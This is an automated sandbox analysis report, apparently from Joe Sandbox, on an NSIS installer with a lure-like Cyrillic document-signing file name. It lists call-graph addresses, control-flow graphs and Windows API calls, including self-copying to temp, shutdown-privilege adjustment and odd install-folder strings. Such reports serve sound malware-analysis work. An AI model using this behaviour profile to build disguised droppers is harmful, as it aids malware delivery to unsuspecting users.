4236->4237 4238 401b37 4239 401b44 4238->4239 4240 401b88 4238->4240 4241 401bcd 4239->4241 4247 401b5b 4239->4247 4242 401bb2 GlobalAlloc 4240->4242 4243 401b8d 4240->4243 4244 406072 18 API calls 4241->4244 4254 402288 4241->4254 4245 406072 18 API calls 4242->4245 4243->4254 4259 406050 lstrcpynW 4243->4259 4246 402282 4244->4246 4245->4241 4252 405795 MessageBoxIndirectW 4246->4252 4257 406050 lstrcpynW 4247->4257 4250 401b9f GlobalFree 4250->4254 4251 401b6a 4258 406050 lstrcpynW 4251->4258 4252->4254 4255 401b79 4260 406050 lstrcpynW 4255->4260 4257->4251 4258->4255 4259->4250 4260->4254 4261 402537 4262 402562 4261->4262 4263 40254b 4261->4263 4265 402596 4262->4265 4266 402567 4262->4266 4264 402ba2 18 API calls 4263->4264 4273 402552 4264->4273 4268 402bbf 18 API calls 4265->4268 4267 402bbf 18 API calls 4266->4267 4270 40256e WideCharToMultiByte lstrlenA 4267->4270 4269 40259d lstrlenW 4268->4269 4269->4273 4270->4273 4271 4025ca 4272 4025e0 4271->4272 4274 405cd7 WriteFile 4271->4274 4273->4271 4273->4272 4275 405d06 5 API calls 4273->4275 4274->4272 4275->4271 4276 4014b8 4277 4014be 4276->4277 4278 401389 2 API calls 4277->4278 4279 4014c6 4278->4279 3445 4015b9 3446 402bbf 18 API calls 3445->3446 3447 4015c0 3446->3447 3448 405aaf 4 API calls 3447->3448 3460 4015c9 3448->3460 3449 401629 3451 40165b 3449->3451 3452 40162e 3449->3452 3450 405a31 CharNextW 3450->3460 3455 401423 25 API calls 3451->3455 3453 401423 25 API calls 3452->3453 3454 401635 3453->3454 3464 406050 lstrcpynW 3454->3464 3461 401653 3455->3461 3457 4056fb 2 API calls 3457->3460 3458 405718 5 API calls 3458->3460 3459 401642 SetCurrentDirectoryW 3459->3461 3460->3449 3460->3450 3460->3457 3460->3458 3462 40160f GetFileAttributesW 3460->3462 3463 40567e 4 API calls 3460->3463 3462->3460 3463->3460 3464->3459 3465 401939 3466 40193b 3465->3466 3467 402bbf 18 API calls 3466->3467 3468 401940 3467->3468 3471 405841 3468->3471 3472 405b0c 18 API calls 3471->3472 3473 405861 3472->3473 3474 405880 3473->3474 3475 405869 DeleteFileW 3473->3475 3478 4059a0 3474->3478 3507 406050 lstrcpynW 3474->3507 3503 401949 3475->3503 3477 4058a6 3479 4058b9 3477->3479 3480 4058ac lstrcatW 3477->3480 3483 406393 2 API calls 3478->3483 3478->3503 3482 405a50 2 API calls 3479->3482 3481 4058bf 3480->3481 3484 4058cf lstrcatW 3481->3484 3486 4058da lstrlenW FindFirstFileW 3481->3486 3482->3481 3485 4059c5 3483->3485 3484->3486 3487 405a04 3 API calls 3485->3487 3485->3503 3486->3478 3505 4058fc 3486->3505 3488 4059cf 3487->3488 3490 4057f9 5 API calls 3488->3490 3489 405983 FindNextFileW 3493 405999 FindClose 3489->3493 3489->3505 3492 4059db 3490->3492 3494 4059f5 3492->3494 3495 4059df 3492->3495 3493->3478 3497 4051af 25 API calls 3494->3497 3498 4051af 25 API calls 3495->3498 3495->3503 3497->3503 3500 4059ec 3498->3500 3499 405841 62 API calls 3499->3505 3501 405ef1 38 API calls 3500->3501 3501->3503 3502 4051af 25 API calls 3502->3489 3504 4051af 25 API calls 3504->3505 3505->3489 3505->3499 3505->3502 3505->3504 3506 405ef1 38 API calls 3505->3506 3508 406050 lstrcpynW 3505->3508 3509 4057f9 3505->3509 3506->3505 3507->3477 3508->3505 3510 405c00 2 API calls 3509->3510 3511 405805 3510->3511 3512 405814 RemoveDirectoryW 3511->3512 3513 40581c DeleteFileW 3511->3513 3515 405826 3511->3515 3514 405822 3512->3514 3513->3514 3514->3515 3516 405832 SetFileAttributesW 3514->3516 3515->3505 3516->3515 4280 40293b 4281 402ba2 18 API calls 4280->4281 4282 402941 4281->4282 4283 402964 4282->4283 4284 40297d 4282->4284 4292 40281e 4282->4292 4289 402969 4283->4289 4290 40297a 4283->4290 4285 402993 4284->4285 4286 402987 4284->4286 4288 406072 18 API calls 4285->4288 4287 402ba2 18 API calls 4286->4287 4287->4292 4288->4292 4294 406050 lstrcpynW 4289->4294 4295 405f97 wsprintfW 4290->4295 4294->4292 4295->4292 3546 403c3c 3547 403c54 3546->3547 3548 403d8f 3546->3548 3547->3548 3549 403c60 3547->3549 3550 403da0 GetDlgItem GetDlgItem 3548->3550 3551 403de0 3548->3551 3554 403c6b SetWindowPos 3549->3554 3555 403c7e 3549->3555 3552 404114 19 API calls 3550->3552 3553 403e3a 3551->3553 3563 401389 2 API calls 3551->3563 3558 403dca SetClassLongW 3552->3558 3559 404160 SendMessageW 3553->3559 3564 403d8a 3553->3564 3554->3555 3556 403c83 ShowWindow 3555->3556 3557 403c9b 3555->3557 3556->3557 3560 403ca3 DestroyWindow 3557->3560 3561 403cbd 3557->3561 3562 40140b 2 API calls 3558->3562 3585 403e4c 3559->3585 3565 40409d 3560->3565 3566 403cc2 SetWindowLongW 3561->3566 3567 403cd3 3561->3567 3562->3551 3568 403e12 3563->3568 3565->3564 3577 4040ce ShowWindow 3565->3577 3566->3564 3570 403d7c 3567->3570 3571 403cdf GetDlgItem 3567->3571 3568->3553 3572 403e16 SendMessageW 3568->3572 3569 40409f DestroyWindow KiUserCallbackDispatcher 3569->3565 3576 40417b 8 API calls 3570->3576 3574 403cf2 SendMessageW IsWindowEnabled 3571->3574 3575 403d0f 3571->3575 3572->3564 3573 40140b 2 API calls 3573->3585 3574->3564 3574->3575 3579 403d1c 3575->3579 3582 403d63 SendMessageW 3575->3582 3583 403d2f 3575->3583 3590 403d14 3575->3590 3576->3564 3577->3564 3578 406072 18 API calls 3578->3585 3579->3582 3579->3590 3580 4040ed SendMessageW 3584 403d4a 3580->3584 3581 404114 19 API calls 3581->3585 3582->3570 3586 403d37 3583->3586 3587 403d4c 3583->3587 3584->3570 3585->3564 3585->3569 3585->3573 3585->3578 3585->3581 3592 404114 19 API calls 3585->3592 3607 403fdf DestroyWindow 3585->3607 3588 40140b 2 API calls 3586->3588 3589 40140b 2 API calls 3587->3589 3588->3590 3591 403d53 3589->3591 3590->3580 3591->3570 3591->3590 3593 403ec7 GetDlgItem 3592->3593 3594 403ee4 ShowWindow KiUserCallbackDispatcher 3593->3594 3595 403edc 3593->3595 3616 404136 KiUserCallbackDispatcher 3594->3616 3595->3594 3597 403f0e EnableWindow 3600 403f22 3597->3600 3598 403f27 GetSystemMenu EnableMenuItem SendMessageW 3599 403f57 SendMessageW 3598->3599 3598->3600 3599->3600 3600->3598 3617 404149 SendMessageW 3600->3617 3618 406050 lstrcpynW 3600->3618 3603 403f85 lstrlenW 3604 406072 18 API calls 3603->3604 3605 403f9b SetWindowTextW 3604->3605 3606 401389 2 API calls 3605->3606 3606->3585 3607->3565 3608 403ff9 CreateDialogParamW 3607->3608 3608->3565 3609 40402c 3608->3609 3610 404114 19 API calls 3609->3610 3611 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3610->3611 3612 401389 2 API calls 3611->3612 3613 40407d 3612->3613 3613->3564 3614 404085 ShowWindow 3613->3614 3615 404160 SendMessageW 3614->3615 3615->3565 3616->3597 3617->3600 3618->3603 3691 4037bf 3692 4037d7 3691->3692 3693 4037c9 CloseHandle 3691->3693 3698 403804 3692->3698 3693->3692 3696 405841 69 API calls 3697 4037e8 3696->3697 3699 403812 3698->3699 3700 403817 FreeLibrary GlobalFree 3699->3700 3701 4037dc 3699->3701 3700->3700 3700->3701 3701->3696

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4032a0-4032d3 SetErrorMode GetVersion 1 4032d5-4032dd call 40642a 0->1 2 4032e6 0->2 1->2 7 4032df 1->7 4 4032eb-4032ff call 4063ba lstrlenA 2->4 9 403301-403375 call 40642a * 2 #17 OleInitialize SHGetFileInfoW call 406050 GetCommandLineW call 406050 GetModuleHandleW 4->9 7->2 18 403377-40337e 9->18 19 40337f-403399 call 405a31 CharNextW 9->19 18->19 22 4034b0-4034ca GetTempPathW call 40326f 19->22 23 40339f-4033a5 19->23 30 403522-40353c DeleteFileW call 402dee 22->30 31 4034cc-4034ea GetWindowsDirectoryW lstrcatW call 40326f 22->31 25 4033a7-4033ac 23->25 26 4033ae-4033b2 23->26 25->25 25->26 28 4033b4-4033b8 26->28 29 4033b9-4033bd 26->29 28->29 32 4033c3-4033c9 29->32 33 40347c-403489 call 405a31 29->33 51 403542-403548 30->51 52 4035ed-4035fd ExitProcess OleUninitialize 30->52 31->30 48 4034ec-40351c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 31->48 37 4033e4-40341d 32->37 38 4033cb-4033d3 32->38 49 40348b-40348c 33->49 50 40348d-403493 33->50 41 40343a-403474 37->41 42 40341f-403424 37->42 39 4033d5-4033d8 38->39 40 4033da 38->40 39->37 39->40 40->37 41->33 47 403476-40347a 41->47 42->41 46 403426-40342e 42->46 55 403430-403433 46->55 56 403435 46->56 47->33 57 40349b-4034a9 call 406050 47->57 48->30 48->52 49->50 50->23 59 403499 50->59 60 4035dd-4035e4 call 403899 51->60 61 40354e-403559 call 405a31 51->61 53 403723-403729 52->53 54 403603-403613 call 405795 ExitProcess 52->54 66 4037a7-4037af 53->66 67 40372b-403741 GetCurrentProcess OpenProcessToken 53->67 55->41 55->56 56->41 69 4034ae 57->69 59->69 71 4035e9 60->71 77 4035a7-4035b1 61->77 78 40355b-403590 61->78 72 4037b1 66->72 73 4037b5-4037b9 ExitProcess 66->73 75 403743-403771 LookupPrivilegeValueW AdjustTokenPrivileges 67->75 76 403777-403785 call 40642a 67->76 69->22 71->52 72->73 75->76 88 403793-40379e ExitWindowsEx 76->88 89 403787-403791 76->89 81 4035b3-4035c1 call 405b0c 77->81 82 403619-40362d call 405718 lstrcatW 77->82 80 403592-403596 78->80 84 403598-40359d 80->84 85 40359f-4035a3 80->85 81->52 98 4035c3-4035d9 call 406050 * 2 81->98 96 40363a-403654 lstrcatW lstrcmpiW 82->96 97 40362f-403635 lstrcatW 82->97 84->85 91 4035a5 84->91 85->80 85->91 88->66 90 4037a0-4037a2 call 40140b 88->90 89->88 89->90 90->66 91->77 96->52 99 403656-403659 96->99 97->96 98->60 101 403662 call 4056fb 99->101 102 40365b-403660 call 40567e 99->102 107 403667-403675 SetCurrentDirectoryW 101->107 102->107 110 403682-4036ab call 406050 107->110 111 403677-40367d call 406050 107->111 115 4036b0-4036cc call 406072 DeleteFileW 110->115 111->110 118 40370d-403715 115->118 119 4036ce-4036de CopyFileW 115->119 118->115 120 403717-40371e call 405ef1 118->120 119->118 121 4036e0-403700 call 405ef1 call 406072 call 405730 119->121 120->52 121->118 130 403702-403709 CloseHandle 121->130 130->118
                                                            APIs
                                                            • SetErrorMode.KERNELBASE ref: 004032C3
                                                            • GetVersion.KERNEL32 ref: 004032C9
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                            • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                            • OleInitialize.OLE32(00000000), ref: 0040331C
                                                            • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                            • GetCommandLineW.KERNEL32(petrels,NSIS Error), ref: 0040334D
                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00000000), ref: 00403360
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00000020), ref: 00403387
                                                              • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                              • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                              • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,petrels,NSIS Error), ref: 0040605D
                                                            • ExitProcess.KERNEL32(?), ref: 004035ED
                                                            • OleUninitialize.OLE32(?), ref: 004035F2
                                                            • ExitProcess.KERNEL32 ref: 00403613
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403626
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403635
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403640
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00000000,?), ref: 0040364C
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                            • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,0042AA08,00000001), ref: 004036D6
                                                            • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                            • ExitProcess.KERNEL32 ref: 004037B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                            • String ID: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean$C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen$C:\Users\user\Desktop$C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$petrels$~nsu
                                                            • API String ID: 354199918-2644737801
                                                            • Opcode ID: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                            • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                            • Opcode Fuzzy Hash: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                            • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 131 4052ee-405309 132 405498-40549f 131->132 133 40530f-4053d6 GetDlgItem * 3 call 404149 call 404a4c GetClientRect GetSystemMetrics SendMessageW * 2 131->133 135 4054a1-4054c3 GetDlgItem CreateThread FindCloseChangeNotification 132->135 136 4054c9-4054d6 132->136 153 4053f4-4053f7 133->153 154 4053d8-4053f2 SendMessageW * 2 133->154 135->136 138 4054f4-4054fe 136->138 139 4054d8-4054de 136->139 143 405500-405506 138->143 144 405554-405558 138->144 141 4054e0-4054ef ShowWindow * 2 call 404149 139->141 142 405519-405522 call 40417b 139->142 141->138 157 405527-40552b 142->157 148 405508-405514 call 4040ed 143->148 149 40552e-40553e ShowWindow 143->149 144->142 146 40555a-405560 144->146 146->142 155 405562-405575 SendMessageW 146->155 148->142 151 405540-405549 call 4051af 149->151 152 40554e-40554f call 4040ed 149->152 151->152 152->144 160 405407-40541e call 404114 153->160 161 4053f9-405405 SendMessageW 153->161 154->153 162 405677-405679 155->162 163 40557b-4055a6 CreatePopupMenu call 406072 AppendMenuW 155->163 170 405420-405434 ShowWindow 160->170 171 405454-405475 GetDlgItem SendMessageW 160->171 161->160 162->157 168 4055a8-4055b8 GetWindowRect 163->168 169 4055bb-4055d0 TrackPopupMenu 163->169 168->169 169->162 173 4055d6-4055ed 169->173 174 405443 170->174 175 405436-405441 ShowWindow 170->175 171->162 172 40547b-405493 SendMessageW * 2 171->172 172->162 176 4055f2-40560d SendMessageW 173->176 177 405449-40544f call 404149 174->177 175->177 176->176 178 40560f-405632 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 176->178 177->171 180 405634-40565b SendMessageW 178->180 180->180 181 40565d-405671 GlobalUnlock SetClipboardData CloseClipboard 180->181 181->162
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                            • GetClientRect.USER32(?,?), ref: 00405398
                                                            • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                            • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                              • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054C3
                                                            • ShowWindow.USER32(00000000), ref: 004054E7
                                                            • ShowWindow.USER32(000103EC,00000008), ref: 004054EC
                                                            • ShowWindow.USER32(00000008), ref: 00405536
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                            • CreatePopupMenu.USER32 ref: 0040557B
                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                            • GetWindowRect.USER32(?,?), ref: 004055AF
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                            • OpenClipboard.USER32(00000000), ref: 00405610
                                                            • EmptyClipboard.USER32 ref: 00405616
                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                            • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                            • CloseClipboard.USER32 ref: 00405671
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                            • String ID: {
                                                            • API String ID: 4154960007-366298937
                                                            • Opcode ID: f1ec93978149513396b73487a528d371b2697d6e5aee21dfcd7baa8f39a3528c
                                                            • Instruction ID: 61e351ecde1d042c29ac1aa70548d375e1b8ad830a3fa6051c24e393c3684683
                                                            • Opcode Fuzzy Hash: f1ec93978149513396b73487a528d371b2697d6e5aee21dfcd7baa8f39a3528c
                                                            • Instruction Fuzzy Hash: FAB14971800608BFDB119F60DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 426 406072-40607d 427 406090-4060a6 426->427 428 40607f-40608e 426->428 429 4060ac-4060b9 427->429 430 4062be-4062c4 427->430 428->427 429->430 433 4060bf-4060c6 429->433 431 4062ca-4062d5 430->431 432 4060cb-4060d8 430->432 434 4062e0-4062e1 431->434 435 4062d7-4062db call 406050 431->435 432->431 436 4060de-4060ea 432->436 433->430 435->434 438 4060f0-40612c 436->438 439 4062ab 436->439 440 406132-40613d GetVersion 438->440 441 40624c-406250 438->441 442 4062b9-4062bc 439->442 443 4062ad-4062b7 439->443 446 406157 440->446 447 40613f-406143 440->447 444 406252-406256 441->444 445 406285-406289 441->445 442->430 443->430 449 406266-406273 call 406050 444->449 450 406258-406264 call 405f97 444->450 452 406298-4062a9 lstrlenW 445->452 453 40628b-406293 call 406072 445->453 451 40615e-406165 446->451 447->446 448 406145-406149 447->448 448->446 454 40614b-40614f 448->454 464 406278-406281 449->464 450->464 456 406167-406169 451->456 457 40616a-40616c 451->457 452->430 453->452 454->446 460 406151-406155 454->460 456->457 462 4061a8-4061ab 457->462 463 40616e-40618b call 405f1d 457->463 460->451 467 4061bb-4061be 462->467 468 4061ad-4061b9 GetSystemDirectoryW 462->468 471 406190-406194 463->471 464->452 466 406283 464->466 472 406244-40624a call 4062e4 466->472 469 4061c0-4061ce GetWindowsDirectoryW 467->469 470 406229-40622b 467->470 473 40622d-406231 468->473 469->470 470->473 474 4061d0-4061da 470->474 475 406233-406237 471->475 476 40619a-4061a3 call 406072 471->476 472->452 473->472 473->475 478 4061f4-40620a SHGetSpecialFolderLocation 474->478 479 4061dc-4061df 474->479 475->472 481 406239-40623f lstrcatW 475->481 476->473 484 406225 478->484 485 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 478->485 479->478 483 4061e1-4061e8 479->483 481->472 487 4061f0-4061f2 483->487 484->470 485->473 485->484 487->473 487->478
                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,?,004051E6,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,00000000,?), ref: 00406135
                                                            • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004061B3
                                                            • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004061C6
                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                            • SHGetPathFromIDListW.SHELL32(?,Remove folder: ), ref: 00406210
                                                            • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                            • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                            • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,?,004051E6,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,00000000,?), ref: 00406299
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
